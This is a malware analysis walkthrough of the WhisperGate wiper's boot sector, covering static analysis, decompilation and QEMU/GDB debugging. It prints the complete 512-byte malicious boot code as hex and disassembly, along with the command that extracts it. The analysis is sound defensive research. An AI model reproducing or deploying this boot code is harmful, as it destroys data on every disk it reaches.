Analyzing MBR Malware
Many years ago, I read through a catalog of master’s courses. One of the first courses in the program is about operating systems. The very first topic they explore is how to create a custom, operating-system-agnostic bootloader from scratch.
Custom bootloaders, much like custom inits and custom kernels, have a place in my heart where a Linux hobbyist still exists. The process is not necessarily difficult, but it does require a lot of reading into some narrow topics (such as the IA-32 Software Developer’s Manual, or relevant ARM64 resources on the topic). It can quickly become challenging depending on what exactly you want to the boot code to do.
A good example of a widely known bootloader is GRUB. Most Linux desktop or server users know it through a handful of configurations and commands, like update-grub
.
The grub-install
command modifies the MBR on legacy BIOS systems, but most users aren’t interested in what it really does. Compared to a hand-written bootloader, the user may have limited visibility or control over the generated code. Often, it’s sufficient to know that it “just works.”
But where’s the fun in that?
Over the past decade, we’ve seen instances of ransomware and wipers leveraging MBR boot code for persistence and elevated privileges. My very first time hearing about MBR-based malware came with the reports of STUXNET. A few years later, a late friend in the Linux community had also brought it up (in a larger discussion about the desktop model’s attack surface).
This should raise a question: how difficult is it to write MBR malware? Before that, we should discuss the paramters for writing MBR boot code in general.
Malware in the MBR
Writing dubious or malicious boot code is a well-documented subject. If you’re new to the topic, I strongly recommend this writeup by Red Team Notes. It’s a fun starting point and a succint introduction.
An interesting, if unfortunate, consequence of MBR code is that it runs in 16-bit “Real Mode.” This limits the boot code a handful of rules and BIOS system interrupts.
Real-mode is also highly privileged. It runs well before the operating system loads, and therefore has precedence over Linux root or Windows Administrator privileges. If abused, this can cause severe damage to the system and hard disks, and the operating system may have no knowledge of it or any way to deter it.
An interesting feature of Real Mode is that it is operating-system agnostic by design. This means that you could develop a different malware loader for many operating systems or architectures that overwrites the victim’s MBR with the same boot code. In other words, while malware strands are often Windows-based, you could just as easily write a Linux or BSD variant and get the same outcome.
MBR boot code is more likely to use real mode only to execute a second stage in 32-bit “Protected Mode.” This second stage will contain more sophisticated boot code and is the basis of how bootloaders, including GRUB, operate behind the scenes. For malware authors, this could provide more opportunities for better attacks.
Most modern computers are likely to use UEFI, not BIOS, to boot. At the cost of some complexity, UEFI offers robust features such as Secure Boot, and generally has an easier time booting from flash storage, such as NVMe. This is usually a good thing.
So, why bring up MBR malware now? Lots of legacy systems still use BIOS. If your grandma is still playing Solitaire on her same Windows XP computer from the 2000s, she’s probably running BIOS with MBR. The same is true for agencies or organizations running the same systems from ten, twenty, or thirty years ago.
As malware in and of itself, STUXNET is often considered one of the greats. At least, it’s one of the most widely studied. You can certainly find samples online as well as an entire GitHub repo with the code reverse engineered in C.
However, there are plenty of other MBR-based malware samples from the past decade. A notable example is a NotPetya variant, which employed a malicious MBR in order to facilitate ransomware. But another MBR-based sample caught my eye fairly recently: WhisperGate.
WhisperGate
WhisperGate is “a multi-stage wiper designed to look like ransomware.” The bit about being a wiper disguised as ransomware cannot be understated. (It’s one reason why people will often recommend not to pay the attacker. With a wiper, the ransom money cannot recover your data, because even the attackers cannot recover your data.)
Campaigns which deployed WhisperGate targeted a handful of Ukrainian sectors, including government, nonprofit, and IT organizations. In September of last year, the group made headlines after the FBI arrested several Russian officials who were linked to the malware campaign.
A well-documented WhisperGate variant used three stages: one to corrupt the bootloader (T1542), another to download the third stage from a Discord server, and a final one to both tamper with Windows Defender and to overwrite files from a pre-set list of extensions.
The first stage caught my attention.
CrowdStrike describes the MBR-corrupting routine with the following pseudocode:
for i_disk between 0 and total_detected_disk_count do
for i_sector between 1 and total_disk_sector_count, i_sector += 199, do
overwrite disk i_disk at sector i_sector with hardcoded data
done
done
Note: The bit about skipping 199 sectors was, and still is, interesting. My best guess here is coverage. By skipping every 199 sectors, you get a good-enough tradeoff for data corruption and total execution time.
If you run WhisperGate in a public sandbox, it will likely do nothing. One sandbox in particular marked it safe because it probed the registry for two keys and aborted execution. This is likely defense evasion (T1497), as the key values were empty because of the sandbox configuration.
There’s a very good writeup on the malware, which I would strongly recommend reading. It covers the details succinctly and was a true starting point for this guide.
In my walkthrough here, I’ll simply expand on these findings by investigating a few questions:
- How could we determine this was MBR malware?
- What does the MBR boot code look like in the binary?
- How can you isolate the MBR boot code?
- How would you analyze the boot code using static and dynamic analysis?
To that end, we will take “the hard way” to investigate the boot code. The tools used here are well-known and open source, so you can follow along or follow up on anything discussed here. This guide uses a Unix-like environment for analysis.
Of note, we will spend far less time on the malicious installer, and far more time on the aspects of it that deal with the MBR code. The boot code specifically is the main point of discussion.
Extracting the MBR code
First, we need a sample of this malware. Both the CrowdStrike and the S2W guides investigate the sample with the following SHA256 hash:
a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92
You can download this from sites like the Malware Bazaar. Unzip it with the password, and you’ll have an EXE whose name matches the hash value.
If you’re on a Linux system, use objdump
.
If you’re on macOS, you can use the equivalent package from Homebrew:
/opt/homebrew/Cellar/x86_64-elf-binutils/<version>/bin/x86_64-elf-objdump
First, let’s confirm the file type:
$ file a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe
a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
In this case, the filename is the same value as the hash. This is useful for initial analysis, but it’s a pretty long filename. Let’s alias it to wg.exe
just for clarity moving forward:
cp a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe wg.exe
Next, let’s dump strings (annotated):
$ strings wg.exe
(A) !This program cannot be run in DOS mode.
...
(B) AAAAA
Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.
...
(C) glob-1.0-mingw32
(D) GCC: (GNU) 6.3.0
...
(E) CreateFileW
...
(F) WriteFile
...
Of interest, we find:
- A: PE header artifact
- B: Ransom note, repeated several times
- C, D: Evidence that MinGW and GCC were used to build this
- E, F: File manipulation calls for Windows
There are other interesting strings, but this discussion is about the MBR code specifically, so let’s focus on that. We know from other research that WriteFile is the API function that overwrites the MBR. However, even without prior knowledge (or an entire writeup) of the installer, WriteFile is a good starting point for analysis, because it can indiscriminately overwrite sections of the hard drive.
With that in mind, let’s analyze focus on these strings specifically:
- B tells us that the ransom note is not obfuscated or encrypted. This suggests that the MBR code may exist in cleartext, without any weird decoding or decryption routines. This makes it a low-hanging fruit for analysis.
- F confirms that WriteFile is used in this sample.
- The call to CreateFileW at E opens the primary hard drive for writing the corrupted MBR code. Its result, a
HANDLE
type, becomes the first parameter in the call to WriteFile.
Disassemble and search for the WriteFile
section. Notice it’s stripped, so we can’t grep the disassembly for something like call WriteFile
. Instead, we need to find the file offset.
We can use the following formula:
ImageBase + VirtualMemoryAddress = Offset
To get these values, call objdump
with the -x
parameter:
$ objdump -x wg.exe
...
ImageBase 00400000
...
vma: Ordinal Hint Member-Name Bound-To
--[snip]--
0000a180 <none> 04f3 WriteFile
...
In this case, the image base is 0x00400000 and the VMA offset is 0x0000a180
So:
0x400000 + 0xa180 = 0x40a180
If we grep the disassembly for references to 40a180, we end up in the import address table:
$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 40a180 -B 4
2ea0: ff 25 94 a1 40 00 jmp DWORD PTR ds:0x40a194
2ea6: 90 nop
2ea7: 90 nop
2ea8: ff 25 80 a1 40 00 jmp DWORD PTR ds:0x40a180
Since the jmp
statement for WriteFile is at address 0x2ea8, let’s grep for references to 2ea8 instead:
$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 2ea8
2ea8: ff 25 80 a1 40 00 jmp DWORD PTR ds:0x40a180
2ff9: e8 aa fe ff ff call 0x2ea8
In addition to the IAT entry, we also see a call to the IAT address, which confirms that WriteFile is used in this code.
Recall earlier that many results appeared containing the ransom note. To find which one is actually used, we can backtrack the assembly:
$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 0x2ea8 -B 100
...
2f7a: be 20 40 40 00 mov esi,0x404020
...
2f81: 8d bd e8 df ff ff lea edi,[ebp-0x2018]
...
2f91: f3 a5 rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
...
2fd1: 8d 85 e8 df ff ff lea eax,[ebp-0x2018]
...
2fed: c7 44 24 08 00 02 00 mov DWORD PTR [esp+0x8],0x200
2ff4: 00
2ff5: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
2ff9: e8 aa fe ff ff call 0x2ea8
The text snippet here shows how the ransom note, located at 0x404020, is passed along as an argument to the WriteFile call at 0x2ff9. We could express the call line in C like:
WriteFile(fileHandle, (LPCVOID)0x404020, 0x200, 0, 0)
In this case, the data at 0x404020 contains the ransom note needed. 512 (0x200) bytes, the size of the MBR, are used in the call to WriteFile. This is likely the MBR code, but we want to prove it before relying on assumptions. So, let’s get the file offset and see what data exists there.
To find the file offset, first get the .data
section’s VMA and File Offset:
$ objdump -x wg.exe
...
Sections:
Idx Name Size VMA LMA File off Algn
...
1 .data 00002038 00404000 00404000 00003200 2**5
We can determine the file offset with:
VirtualOffset - DataSectionVMA + DataSectionFileOffset
So:
0x404020 - 0x404000 + 0x3200 = 0x3220.
We can confirm this is correct using hexdump:
$ hexdump -C wg.exe | \
grep 3220 -A $((0x1F))
00003220 eb 00 8c c8 8e d8 be 88 7c e8 00 00 50 fc 8a 04 |........|...P...|
00003230 3c 00 74 06 e8 05 00 46 eb f4 eb 05 b4 0e cd 10 |<.t....F........|
00003240 c3 8c c8 8e d8 a3 78 7c 66 c7 06 76 7c 82 7c 00 |......x|f..v|.|.|
00003250 00 b4 43 b0 00 8a 16 87 7c 80 c2 80 be 72 7c cd |..C.....|....r|.|
00003260 13 72 02 73 18 fe 06 87 7c 66 c7 06 7a 7c 01 00 |.r.s....|f..z|..|
00003270 00 00 66 c7 06 7e 7c 00 00 00 00 eb c4 66 81 06 |..f..~|......f..|
00003280 7a 7c c7 00 00 00 66 81 16 7e 7c 00 00 00 00 f8 |z|....f..~|.....|
00003290 eb af 10 00 01 00 00 00 00 00 01 00 00 00 00 00 |................|
000032a0 00 00 41 41 41 41 41 00 59 6f 75 72 20 68 61 72 |..AAAAA.Your har|
000032b0 64 20 64 72 69 76 65 20 68 61 73 20 62 65 65 6e |d drive has been|
000032c0 20 63 6f 72 72 75 70 74 65 64 2e 0d 0a 49 6e 20 | corrupted...In |
000032d0 63 61 73 65 20 79 6f 75 20 77 61 6e 74 20 74 6f |case you want to|
000032e0 20 72 65 63 6f 76 65 72 20 61 6c 6c 20 68 61 72 | recover all har|
000032f0 64 20 64 72 69 76 65 73 0d 0a 6f 66 20 79 6f 75 |d drives..of you|
00003300 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2c 0d |r organization,.|
00003310 0a 59 6f 75 20 73 68 6f 75 6c 64 20 70 61 79 20 |.You should pay |
00003320 75 73 20 20 24 31 30 6b 20 76 69 61 20 62 69 74 |us $10k via bit|
00003330 63 6f 69 6e 20 77 61 6c 6c 65 74 0d 0a 31 41 56 |coin wallet..1AV|
00003340 4e 4d 36 38 67 6a 36 50 47 50 46 63 4a 75 66 74 |NM68gj6PGPFcJuft|
00003350 4b 41 54 61 34 57 4c 6e 7a 67 38 66 70 66 76 20 |KATa4WLnzg8fpfv |
00003360 61 6e 64 20 73 65 6e 64 20 6d 65 73 73 61 67 65 |and send message|
00003370 20 76 69 61 0d 0a 74 6f 78 20 49 44 20 38 42 45 | via..tox ID 8BE|
00003380 44 43 34 31 31 30 31 32 41 33 33 42 41 33 34 46 |DC411012A33BA34F|
00003390 34 39 31 33 30 44 30 46 31 38 36 39 39 33 43 36 |49130D0F186993C6|
000033a0 41 33 32 44 41 44 38 39 37 36 46 36 41 35 44 38 |A32DAD8976F6A5D8|
000033b0 32 43 31 45 44 32 33 30 35 34 43 30 35 37 45 43 |2C1ED23054C057EC|
000033c0 45 44 35 34 39 36 46 36 35 0d 0a 77 69 74 68 20 |ED5496F65..with |
000033d0 79 6f 75 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f |your organizatio|
000033e0 6e 20 6e 61 6d 65 2e 0d 0a 57 65 20 77 69 6c 6c |n name...We will|
000033f0 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 74 6f 20 | contact you to |
00003400 67 69 76 65 20 66 75 72 74 68 65 72 20 69 6e 73 |give further ins|
00003410 74 72 75 63 74 69 6f 6e 73 2e 00 00 00 00 55 aa |tructions.....U.|
Note that the final bytes are 55 aa
, the magic bytes for MBR boot code. We can also see the ransom note in cleartext. This confirms that bytes 0x3220 - 0x3420 contain the MBR.
To isolate the boot code, use dd and extract it to wg.raw:
dd if=wg.exe of=wg-bootcode.raw bs=1 skip=$((0x3220)) count=$((0x200))
At this point, you could apply the boot code to a RAW image and try it out yourself. To supplement this walkthrough, I’ve shared a script that will simulate the outcome in QEMU, then dump the results for analysis. You can adjust the parameters to see how hard disks of different sizes are affected after N seconds (default 5 seconds over 10MB).
For now, you should convince yourself that malware will corrupt the hard drive. On to static analysis.
Analyzing the malicious boot code
Now we can disassemble only the 16-bit bootcode:
$ objdump -D -b binary \
-mi386 \
-Maddr16,data16,intel \
wg-bootcode.raw
wg-bootcode.raw: file format binary
Disassembly of section .data:
00000000 <.data>:
0: eb 00 jmp 0x2
2: 8c c8 mov ax,cs
4: 8e d8 mov ds,ax
6: be 88 7c mov si,0x7c88
9: e8 00 00 call 0xc
c: 50 push ax
d: fc cld
e: 8a 04 mov al,BYTE PTR [si]
10: 3c 00 cmp al,0x0
12: 74 06 je 0x1a
14: e8 05 00 call 0x1c
17: 46 inc si
18: eb f4 jmp 0xe
1a: eb 05 jmp 0x21
1c: b4 0e mov ah,0xe
1e: cd 10 int 0x10
20: c3 ret
21: 8c c8 mov ax,cs
23: 8e d8 mov ds,ax
25: a3 78 7c mov ds:0x7c78,ax
28: 66 c7 06 76 7c 82 7c mov DWORD PTR ds:0x7c76,0x7c82
2f: 00 00
31: b4 43 mov ah,0x43
33: b0 00 mov al,0x0
35: 8a 16 87 7c mov dl,BYTE PTR ds:0x7c87
39: 80 c2 80 add dl,0x80
3c: be 72 7c mov si,0x7c72
3f: cd 13 int 0x13
41: 72 02 jb 0x45
43: 73 18 jae 0x5d
45: fe 06 87 7c inc BYTE PTR ds:0x7c87
49: 66 c7 06 7a 7c 01 00 mov DWORD PTR ds:0x7c7a,0x1
50: 00 00
52: 66 c7 06 7e 7c 00 00 mov DWORD PTR ds:0x7c7e,0x0
59: 00 00
5b: eb c4 jmp 0x21
5d: 66 81 06 7a 7c c7 00 add DWORD PTR ds:0x7c7a,0xc7
64: 00 00
66: 66 81 16 7e 7c 00 00 adc DWORD PTR ds:0x7c7e,0x0
6d: 00 00
6f: f8 clc
70: eb af jmp 0x21
...
For now, it’s enough to note that the data corruption is a result of calling BIOS Interrupt 13h (disk operations) in mode 43h (extended write sectors to drive). The parameters for this interrupt:
Registers | Description |
---|---|
AH | 43h = function number for extended write |
AL | bit 0 = 0: close write check, bit 0 = 1: open write check, bit 1-7:reserved, set to 0 |
DL | drive index (e.g. 1st HDD = 80h) |
DS:SI | segment:offset pointer to the DAP |
You can refer to the disassembly to see where these parameters are set up and where the call occurs. I’ll refer back to them throughout the rest of this analysis.
A quick note: the virtual offset here is 0x7c00. This is a requirement for most (if not all) MBR code, as the boot code will load at this address. This is because real-mode boot code is just RAW data, and doesn’t follow a well-defined format like an ELF or PE. Put another way, the entire 512-byte image is treated as the “code section,” which is simply not accurate.
And that is important to know because the “data section” in this boot code is also not clearly defined as it would be in an ELF or PE file. That’s why you see statements like:
2: 8c c8 mov ax,cs
4: 8e d8 mov ds,ax
By storing the value of cs
(code section) into ds
(data section), the boot code is setting up the entire 512 bytes as writable data. This allows the boot code to use areas of the image data as data segments and obviates the need for explicit data segments or stack buffers. You can see this, in the usage of <SIZE> PTR ds:<address>
, in lines like:
45: fe 06 87 7c inc BYTE PTR ds:0x7c87
49: 66 c7 06 7a 7c 01 00 mov DWORD PTR ds:0x7c7a,0x1
...
52: 66 c7 06 7e 7c 00 00 mov DWORD PTR ds:0x7c7e,0x0
...
5d: 66 81 06 7a 7c c7 00 add DWORD PTR ds:0x7c7a,0xc7
...
66: 66 81 16 7e 7c 00 00 adc DWORD PTR ds:0x7c7e,0x0
For example, the byte at location 0x87 is used to store the current hard drive index. The actual location here is just after the “AAAAA” string in the data area:
Disk Index As String
--------------------------------v--------------------------- -------v--------
00000080 00 00 41 41 41 41 41 00 59 6f 75 72 20 68 61 72 |..AAAAA.Your har|
We can see that the byte which holds the disk index is set to zero (0) initially. For each hard drive detected, this value will increase as the data-corruption routine continues. (Informationally, this also confirms that the malware will start by corrupting data on your primary hard drive.)
At the cost of using less intuitive code, this approach is rather brilliant given the space limitations of the MBR and its rigid boot-code specification.
Another note: the entire 512 bytes will disassemble, but anything after location 0x70 is just data, so its disassembly is incorrect. How can we infer that?
If you look at line 0x3c, you’ll note that si
now contains the value at 0x7c72
, which maps to offset 0x72
in the raw image. This is an argument in the interrupt 0x13 call, so it should point to data, not code. Notice also that no address prior to 0x7c72
is referenced anywhere in this code for use with data read-write operations.
We can infer that the disassembly effectively ends just before this, at 0x70, whose disassembly establishes that the data-corrupting routine will literally never halt. Anything after 0x70 that is just data meant for read-write purposes. Put another way, the boot code will not attempt to write any data before 0x70, hence the clipped disassembly earlier.
The MBR boot code displays a message and overwrites hard-drive sectors. I’m more interested in this second behavior, and the rest of the guide will focus exclusively on it. The research discussed earlier provides a good explanation, but we can expand on a few concepts that it left out: decompilation, DAP, and LBA.
Decompilation
Let’s start with decompilation. Something I found interesting at first was that the author didn’t decompile the MBR code. I tried it myself by hand, and again with Ghidra, and compared the results.
Note: To load the MBR binary into Ghidra, you’ll have to import the RAW file as x86 16-byte Real-Mode. When the disassembly listing loads, right-click the first line, then click Disassemble. This should produce the correct disassembly along with some attempts at decompiled logic.
MBR code is small, so it’s fairly easy to decompile on your own. My first attempt used a form of pseudocode. The result looked something like this:
while True, do
ds = cs
*((uint16_t *)(ds+0x78)) = cs
*((uint32_t *)(ds+0x76)) = 0x82
mode = 0x43 // Extended write mode
write_check = 0 // Disable write verification
disk_index = *((uint8_t *)(ds+0x87)) + 0x80 // Start at disk 1
dap_start_addr = 0x72 // Read from file offset 0x72
error, _ = interrupt(
0x13: interrupt_code,
mode: ah,
write_check: al,
disk_index: dl,
dap_start_addr: si
)
if error == 1, then
*((uint8_t *)(ds+0x87)) += 1
*((uint32_t *)(ds+0x7a)) = 1
*((uint32_t *)(ds+0x7e)) = 0
else
*((uint32_t *)(ds+0x7a)) = 0xc7
*((uint32_t *)(ds+0x7e)) = cf
end if
done
Something that makes BIOS interrupts challenging is their lack of mapping to C syntax. This pseudocode uses a syntax like:
interrupt(code, args...)
Where args...
are register names passed in alphabetical order (AH, AL, DL, and SI). But still, there’s no “official” way to express this. In translating this to a high-level language, the “best” approach will likely assume that each register represents a global variable of the same name.
Many resources on reverse engineering will encourage you to write your own decompilation. The reason why is intuitive (learning moments), but sometimes it is also practical. To appreciate the practicality, let’s compare it to Ghidra’s decompilation of the same code block:
void FUN_0000_7c21(void)
{
char *pcVar1;
ulong *puVar2;
long *plVar3;
ulong uVar4;
code *pcVar5;
undefined2 unaff_CS;
bool bVar6;
do {
while( true ) {
*(undefined2 *)0x7c78 = unaff_CS;
*(char **)0x7c76 = s_AAAAA_0000_7c82;
bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
pcVar5 = (code *)swi(0x13);
(*pcVar5)();
if ((bVar6) || (bVar6)) break;
puVar2 = (ulong *)0x7c7a;
uVar4 = *puVar2;
*puVar2 = *puVar2 + 199;
plVar3 = (long *)0x7c7e;
*plVar3 = *plVar3 + (ulong)(0xffffff38 < uVar4);
}
pcVar1 = (char *)((int)s_AAAAA_0000_7c82 + 5);
*pcVar1 = *pcVar1 + '\x01';
*(undefined4 *)0x7c7a = 1;
*(undefined4 *)0x7c7e = 0;
} while( true );
}
Notice that these lines:
bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
pcVar5 = (code *)swi(0x13);
(*pcVar5)();
Represent this assembly excerpt:
35: 8a 16 87 7c mov dl,BYTE PTR ds:0x7c87
39: 80 c2 80 add dl,0x80
3c: be 72 7c mov si,0x7c72
3f: cd 13 int 0x13
In this case, the start of the data section (in SI) is not represented at all. It’s also not clear how bVar6, which includes the arguments, is being used (or if it’s used at all). This further complicates the next line:
if ((bVar6) || (bVar6)) break;
The condition (bVar6) || (bVar6)
seems redundant and appears to return a constant result. It appears to never break or always break, depending on the truthiness of the value. This is in sharp contrast to the IF/ELSE behavior, which is a bit more clear in the disassembly:
41: 72 02 jb 0x45 ; Error
43: 73 18 jae 0x5d ; Success
I say “a bit more clear” because the JB and JAE mnemonics use the value in CF to determine where to jump, and that may be less forthcoming than a deliberate IF-ELSE like we use in higher-level languages. (In addition, the JB statement is unnecessary here.) Regardless, you may appreciate why some people still encourage the “hard way” of analyzing disassembled code over blindly trusting decompiled code.
Disk Address Packet (DAP)
Another area that was briefly touched on in the original analysis was the disk address packet (DAP). This is defined in the BIOS Enhanced Disk Drive Specification Version 3.0 documentation on page 4.
Offset | Type | Description |
---|---|---|
0 | Byte | Packet size in bytes. Shall be 16 (10h) or greater. If the packet size is less than 16 the request is rejected with CF=1h and AH=01h. Packet sizes greater than 16 are not rejected, the additional bytes beyond 16 shall be ignored. |
1 | Byte | Reserved, must be 0 |
2 | Byte | Number of blocks to transfer. This field has a maximum value of 127 (7Fh). A block count of 0 means no data is transferred. If a value greater than 127 is supplied the request is rejected with CF=1 and AH=01. |
3 | Byte | Reserved, must be 0 |
4 | Double word | Address of transfer buffer. The is the buffer which Read/Write operations will use to transfer the data. This is a 32-bit address of the form Seg:Offset. If this field is set to FFFF:FFFF then the address of the transfer buffer is found at offset 10h |
8 | Quad word | Starting logical block address, on the target device, of the data to be transferred. This is a 64 bit unsigned linear address. If the device supports LBA addressing this value should be passed unmodified. If the device does not support LBA addressing the following formula holds true when the address is converted to a CHS value (…) |
Note: Because we’re working with a 32-bit architecture in mind, I’m omitting the last two rows, which discuss 64-bit quadwords.
This represents 16 bytes (0x10 bytes) of total space. Recall earlier, we observe that the data at 0x7c72 is used for the DAP. We can use the physical offset to get a range
0x72 - (0x72 + 0x10) => 0x72 - 0x82
Let’s inspect these bytes:
00000070 eb af 10 00 01 00 00 00 00 00 01 00 00 00 00 00 |................|
00000080 00 00 41 41 41 41 41 00 59 6f 75 72 20 68 61 72 |..AAAAA.Your har|
This gives us a sequence:
10 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00
This data structure is read as little endian, so the bytes will reverse. We can map this against the DAP specification:
File Offset | Value | Meaning |
---|---|---|
0x72 | 0x10 |
Constant 16 (0x10) |
0x73 | 0x00 |
Constant 0 |
0x74 | 0x01 |
Transfer one block |
0x75 | 0x00 |
Constant 0 |
0x76 | 0x00000000 |
Transfer buffer offset |
0x7a | 0x0000000000000001 |
Start at block one of the LBA |
Recall that, at the beginning of this loop, the value at 0x76 was assigned the address of the ransom note:
28: 66 c7 06 76 7c 82 7c mov DWORD PTR ds:0x7c76,0x7c82
So the transfer buffer offset is really set to 0x00007c82
during runtime.
Note: Earlier, the value at
cs
is moved into the transfer buffer offset’s third byte. The purpose for this is not clear, as the instruction shown at offset 0x28 immediately overwrites it with a DWORD. This is the kind of thing that dynamic analysis will help answer.
The DAP uses these settings on the first invocation of INT 0x13 and on each error. It also resets the target LBA (0x7a - 0x81) to 1
when CF is 1 (indicating an error), when it retrieves the next disk:
45: fe 06 87 7c inc BYTE PTR ds:0x7c87
49: 66 c7 06 7a 7c 01 00 mov DWORD PTR ds:0x7c7a,0x1
50: 00 00
52: 66 c7 06 7e 7c 00 00 mov DWORD PTR ds:0x7c7e,0x0
59: 00 00
If INT 0x13 is successful (CF == 0), the loop stays on the current disk, and iterates by 199 (0xc7) sectors, where it will attempt to overwrite data with the ransom message.
5d: 66 81 06 7a 7c c7 00 add DWORD PTR ds:0x7c7a,0xc7
64: 00 00
66: 66 81 16 7e 7c 00 00 adc DWORD PTR ds:0x7c7e,0x0
What’s interesting to me is on offset 0x66. We could decompile this line as:
*((uint32_t *)(ds+0x7c7e)) += (0x0 + CF)
However, the branch leading to 0x5d is only possible if CF == 0. I don’t see how this adjusts anything about the next LBA. Perhaps dynamic analysis could shed light here.
Debugging
Debugging real-mode code is feasible with QEMU, but there are some limits with the way that newer versions handle it. I found it easier to install Debian 9 in a VM, update using the archive repos, and install its version of QEMU and GDB. It’s a small bit of setup, but it works fine.
$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 9.7 (stretch)
Release: 9.7
Codename: stretch
$ uname -a
Linux ... 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
$ qemu-system-x86_64 --version
QEMU emulator version 2.8.1(Debian 1:2.8+dfsg-6+deb9u17)
Copyright (c) 2003-2016 Fabrice Bellard and the QEMU Project developers
$ apt-cache policy gdb qemu-system
gdb:
Installed: 7.12-6
Candidate: 7.12-6
Version table:
*** 7.12-6 500
500 http://archive.debian.org/debian stretch/main amd64 Packages
100 /var/lib/dpkg/status
qemu-system:
Installed: 1:2.8+dfsg-6+deb9u17
Candidate: 1:2.8+dfsg-6+deb9u17
Version table:
*** 1:2.8+dfsg-6+deb9u17 500
500 http://archive.debian.org/debian-security stretch/updates/main amd64 Packages
100 /var/lib/dpkg/status
1:2.8+dfsg-6+deb9u9 500
500 http://archive.debian.org/debian stretch/main amd64 Packages
Note: Newer versions of QEMU will display inaccurate disassembly. This is annoying and gets in the way of debugging efforts.
First, run the QEMU system with debug options:
qemu-system-i386 \
-drive format=raw,file=disk.raw,index=0 \
-s -S
-S
and -s
will launch a debugger on port 1234 and will pause execution so you can attach the debugger.
We can now use GDB:
$ gdb \
-ex 'target remote localhost:1234' \
-ex 'set architecture i8086' \
-ex 'break *0x7c00' \
-ex 'continue' \
-ex 'set disassembly-flavor intel' \
-ex 'x/36i $pc' \
-q
Remote debugging using localhost:1234
warning: No executable has been specified and target does not support
determining executable automatically. Try using the "file" command.
0x0000fff0 in ?? ()
warning: A handler for the OS ABI "GNU/Linux" is not built into this configuration
of GDB. Attempting to continue with the default i8086 settings.
The target architecture is assumed to be i8086
Breakpoint 1 at 0x7c00
Continuing.
Breakpoint 1, 0x00007c00 in ?? ()
=> 0x7c00: jmp 0x7c02
0x7c02: mov ax,cs
0x7c04: mov ds,ax
0x7c06: mov si,0x7c88
0x7c09: call 0x7c0c
0x7c0c: push ax
0x7c0d: cld
0x7c0e: mov al,BYTE PTR [si]
0x7c10: cmp al,0x0
0x7c12: je 0x7c1a
0x7c14: call 0x7c1c
0x7c17: inc si
0x7c18: jmp 0x7c0e
0x7c1a: jmp 0x7c21
0x7c1c: mov ah,0xe
0x7c1e: int 0x10
0x7c20: ret
0x7c21: mov ax,cs
0x7c23: mov ds,ax
0x7c25: mov ds:0x7c78,ax
0x7c28: mov DWORD PTR ds:0x7c76,0x7c82
0x7c31: mov ah,0x43
0x7c33: mov al,0x0
0x7c35: mov dl,BYTE PTR ds:0x7c87
0x7c39: add dl,0x80
0x7c3c: mov si,0x7c72
0x7c3f: int 0x13
0x7c41: jb 0x7c45
0x7c43: jae 0x7c5d
0x7c45: inc BYTE PTR ds:0x7c87
0x7c49: mov DWORD PTR ds:0x7c7a,0x1
0x7c52: mov DWORD PTR ds:0x7c7e,0x0
0x7c5b: jmp 0x7c21
0x7c5d: add DWORD PTR ds:0x7c7a,0xc7
0x7c66: adc DWORD PTR ds:0x7c7e,0x0
0x7c6f: clc
0x7c70: jmp 0x7c21
(gdb)
The disassembly matches the output from objdump
, so the configuration works. The GDB command x/36i $pc
, used as a command-line argument, dumps everything up to 0x70
(0x7c70
given the virtual offset). We can now run dynamic tests as needed.
There are a couple of things I want to test.
First, I want to prove that the carry flag CF is always set to zero, thereby confirming my suspicion that the instructions on lines 0x66 and 0x67 are redundant. We can prove this with a conditional breakpoint:
break *0x7c66 if $eflags 1
continue
This will break at line 0x66 only if CF == 1. You can continue execution. This condition is never triggered, and the process will continue indefinitely. We can conclude that the MOV
statement is indeed useless.
Next, I want to see what value is actually set at 0x7c76, which falls in the range of the transfer buffer address. Restart the debugger and QEMU. Place a breakpoint at that instruction, continue execution, and inspect the values:
break *0x7c25
continue
...
info reg cs eax
Both AX and CS are set to 0x0. No change is made to the transfer buffer address. The purpose of this instruction is still not clear, but at least we know it’s not altering the code in any meaningful way.